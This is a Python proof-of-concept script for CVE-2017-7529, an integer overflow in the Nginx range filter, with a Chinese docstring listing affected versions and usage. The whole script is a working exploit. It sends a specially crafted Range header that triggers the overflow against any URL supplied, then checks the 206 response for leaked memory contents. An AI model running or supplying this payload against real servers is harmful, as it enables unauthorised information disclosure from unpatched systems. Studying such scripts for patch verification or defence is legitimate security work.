# coding=utf-8
"""
DATE:   2021/6/23
AUTHOR: TesterCC
"""

'''
CVE-2017-7529 Nginx整数溢出漏洞

在Nginx的range filter中存在整数溢出漏洞，可以通过带有特殊构造的range的HTTP头的恶意请求引发这个整数溢出漏洞，并导致信息泄露
影响范围: Nginx 0.5.6 – 1.13.2

usage: 

python CVE-2017-7529.py http://10.x.x.x:8080
'''

import sys

import requests
import urllib3
urllib3.disable_warnings()


def HTTPRequest(url, headers, timeout=7):
    response = requests.get(url, headers=headers, timeout=timeout)
    headers = response.headers
    print("status: {} Server: {}".format(response.status_code, headers.get('Server', '')))
    return response


def Exploit(url):
    print("Target: ", url)
    response = HTTPRequest(url, headers={})
    content_length = response.headers.get('Content-Length', 0)
    byteslg = int(content_length) + 623
    content_length = "bytes=-%d, -9223372036854%d" % (byteslg, 776000 - byteslg)

    response = HTTPRequest(url, headers={'Range': content_length})
    if response.status_code == 206 and "Content-Range" in response.text:
        print("[+] Vulnerable CVE-2017-7529 exist")
    else:
        print("[+] Can't Find Vulnerable")


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("[*] missing args, usage:\npython CVE-2017-7529.py http://10.x.x.x:8080")
        sys.exit()

    url = sys.argv[1]
    Exploit(url)